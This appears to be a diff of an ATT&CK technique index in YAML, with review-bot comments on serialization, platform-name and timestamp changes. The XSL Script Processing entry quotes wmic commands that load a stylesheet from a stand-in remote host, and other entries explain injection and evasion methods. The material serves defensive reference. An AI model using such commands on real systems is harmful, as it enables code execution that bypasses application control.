- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
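Review bot: the substantive changes to T1055.015 are only the `modified` stamp and the new `(Citation: Hexacorn Listplanting)` in the first sentence of the description; everything else in this hunk is the header block (`id`, `type`, `created`, `created_by_ref`, `external_references`) being deleted here so it can be re-emitted at the tail of the object in the next hunks. Re-wrapping the description paragraph to a different line width adds further noise on top of that; the emitter should either keep upstream line breaks or fold long strings once, so that a citation addition shows up as a one-line diff.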
@@ -13489,6 +13746,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -13503,21 +13763,52 @@ defense-evasion:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -13562,9 +13853,8 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
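Review bot: `x_mitre_platforms` for T1484 drops `Azure AD` and `SaaS` in favour of the single value `Identity Provider`, alongside the version bump from 3.0 to 3.1, which is the upstream platform consolidation. Anything in this repo that buckets techniques by platform string (per-platform index files, filters, tests) needs to learn the new name, otherwise T1484 silently disappears from the cloud and identity views while remaining in the main index; please confirm those generators were re-run as part of this change.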
@@ -13621,8 +13911,8 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -13631,57 +13921,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1220:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Avneet Singh
- - Casey Smith
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
- created: '2018-10-17T00:14:20.652Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1220
- url: https://attack.mitre.org/techniques/T1220
- - source_name: Reaqta MSXSL Spearphishing MAR 2018
- url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
- description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
- MSXSL. Retrieved July 3, 2018.
- - source_name: Twitter SquiblyTwo Detection APR 2018
- url: https://twitter.com/dez_/status/986614411711442944
- description: Desimone, J. (2018, April 18). Status Update. Retrieved July
- 3, 2018.
- - source_name: LOLBAS Wmic
- url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
- description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
- - source_name: Microsoft msxsl.exe
- url: https://www.microsoft.com/download/details.aspx?id=21714
- description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
- Retrieved July 3, 2018.
- - source_name: Penetration Testing Lab MSXSL July 2017
- url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
- description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
- July 3, 2018.
- - source_name: XSL Bypass Mar 2019
- url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
- description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
- Proxy Code Execution. Retrieved August 2, 2019.
- - source_name: Microsoft XSLT Script Mar 2017
- url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
- description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
- Using . Retrieved July 3, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:12.337Z'
+ name: XSL Script Processing
description: |-
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
@@ -13699,29 +13943,73 @@ defense-evasion:
* Local File: wmic process list /FORMAT:evil[.]xsl
* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XSL Script Processing
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Avneet Singh
+ - Casey Smith
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
- kill_chain_phases:
- - phase_name: defense-evasion
- kill_chain_name: mitre-attack
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- x_mitre_system_requirements:
- - Microsoft Core XML Services (MSXML) or access to wmic.exe
x_mitre_defense_bypassed:
- Anti-virus
- Digital Certificate Validation
- Application Control
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_system_requirements:
+ - Microsoft Core XML Services (MSXML) or access to wmic.exe
+ type: attack-pattern
+ id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+ created: '2018-10-17T00:14:20.652Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1220
+ external_id: T1220
+ - source_name: Reaqta MSXSL Spearphishing MAR 2018
+ description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+ MSXSL. Retrieved July 3, 2018.
+ url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+ - source_name: Twitter SquiblyTwo Detection APR 2018
+ description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+ 12, 2024.
+ url: https://x.com/dez_/status/986614411711442944
+ - source_name: LOLBAS Wmic
+ description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+ - source_name: Microsoft msxsl.exe
+ description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+ Retrieved July 3, 2018.
+ url: https://www.microsoft.com/download/details.aspx?id=21714
+ - source_name: Penetration Testing Lab MSXSL July 2017
+ description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+ July 3, 2018.
+ url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+ - source_name: XSL Bypass Mar 2019
+ description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+ Proxy Code Execution. Retrieved August 2, 2019.
+ url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+ - source_name: Microsoft XSLT Script Mar 2017
+ description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+ Using . Retrieved July 3, 2018.
+ url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1220
atomic_tests: []
T1564.001:
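Review bot: `spec_version: '2.1'` is dropped from T1220 here (and from every object further down) while `x_mitre_attack_spec_version: 3.2.0` is kept. `spec_version` is the STIX 2.1 marker, so removing it everywhere means the index is now generated from a STIX 2.0 bundle rather than the 2.1 collection it was generated from before. If that source change is intentional, state it in the PR description and check that nothing loading this YAML keys on `spec_version`; if it is not, the generator is reading the wrong bundle.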
@@ -13754,7 +14042,7 @@ defense-evasion:
description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
Retrieved July 10, 2017.'
source_name: WireLurker
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T22:32:25.985Z'
name: 'Hide Artifacts: Hidden Files and Directories'
description: |-
Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a
for Windows and ls –a
for Linux and macOS).
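Review bot: the `modified` timestamp moves backwards here (`'2021-04-29T14:49:39.188Z'` becomes `'2020-03-29T22:32:25.985Z'`), and the same regression recurs throughout the patch for objects whose old stamp carries the `.188Z` millisecond suffix (T1578.001, T1480.001, T1216, T1556.004, T1574.004, T1601.002, T1127, T1218.014, T1564.010, T1574.012, T1055.011, T1546.006, T1548.002). Stamps that all share one millisecond value look like collection-level re-stamping by the previous source, so the regression is consistent with a source change rather than data loss, but any consumer that treats `modified` as monotonic will now see every one of these objects as older than the last run. Worth a sentence in the PR description, and a check that nothing downstream caches on `modified`.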
@@ -13782,48 +14070,11 @@ defense-evasion:
- Host forensic analysis
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.001
atomic_tests: []
T1578.001:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
- type: attack-pattern
- created: '2020-06-09T15:33:13.563Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.001
- url: https://attack.mitre.org/techniques/T1578/001
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS Cloud Trail Backup API
- url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
- description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
- Retrieved April 27, 2020.
- - source_name: Azure - Monitor Logs
- url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
- description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
- Retrieved May 1, 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- - source_name: GCP - Creating and Starting a VM
- url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
- description: Google. (2020, April 23). Creating and Starting a VM instance.
- Retrieved May 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:53:44.870Z'
name: Create Snapshot
description: |-
An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
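Review bot: most of this hunk is key reordering of T1578.001 (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `external_references` are all removed here and re-emitted lower in the object in the next hunks) rather than a content change, which buries the real diffs for this object (the `modified` bump, the version bump, the Mandiant URL change) in noise. If the generator can serialize keys in a stable order, the next regeneration will show only semantic changes. Separately, the top of the hunk strips both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` from T1564.001, leaving that object with no spec-version field at all.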
@@ -13832,6 +14083,9 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
@@ -13840,20 +14094,51 @@ defense-evasion:
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create
command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the "sourceSnapshot":
parameter pointed to "global/snapshots/[BOOT_SNAPSHOT_NAME]
.(Citation: GCP - Creating and Starting a VM)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Snapshot: Snapshot Creation'
- 'Snapshot: Snapshot Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+ created: '2020-06-09T15:33:13.563Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/001
+ external_id: T1578.001
+ - source_name: AWS Cloud Trail Backup API
+ description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+ Retrieved April 27, 2020.
+ url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+ - source_name: GCP - Creating and Starting a VM
+ description: Google. (2020, April 23). Creating and Starting a VM instance.
+ Retrieved May 1, 2020.
+ url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure - Monitor Logs
+ description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+ Retrieved May 1, 2020.
+ url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
@@ -13910,6 +14195,7 @@ defense-evasion:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -13920,13 +14206,12 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
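Review bot: the platform list for T1550.001 replaces `Office 365`, `Google Workspace` and `Azure AD` with `Office Suite` and `Identity Provider` (the same substitution is made for T1078.004 and T1556 further down). Any downstream consumer that filters this index by the old platform strings will silently lose these techniques; check that per-platform outputs are regenerated under the new names rather than left stale or empty, and that nothing hard-codes the retired names.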
@@ -13985,11 +14270,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -14029,8 +14313,10 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -14038,13 +14324,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -14075,9 +14361,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1480.001:
@@ -14138,7 +14421,7 @@ defense-evasion:
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-04T14:52:51.290Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Environmental Keying
x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -14160,11 +14443,10 @@ defense-evasion:
- Static File Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.004:
technique:
- modified: '2024-02-14T21:56:34.831Z'
+ modified: '2024-09-12T15:27:29.615Z'
name: 'Hide Artifacts: NTFS File Attributes'
description: |-
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -14231,8 +14513,8 @@ defense-evasion:
Retrieved March 21, 2018.
url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
- source_name: Microsoft File Streams
- description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa364404
+ description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
- source_name: Oddvar Moe ADS2 Apr 2018
description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -14250,7 +14532,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.004
atomic_tests: []
T1055.001:
@@ -14353,12 +14634,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -14371,6 +14651,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -14407,17 +14688,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
@@ -14463,9 +14744,6 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1216:
technique:
@@ -14503,7 +14781,7 @@ defense-evasion:
behavior may be abused by adversaries to execute malicious files that could
bypass application control and signature validation on systems.(Citation:
GitHub Ultimate AppLocker Bypass List)'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:43:46.045Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Signed Script Proxy Execution
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -14522,7 +14800,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216
atomic_tests: []
T1556.004:
@@ -14553,7 +14830,7 @@ defense-evasion:
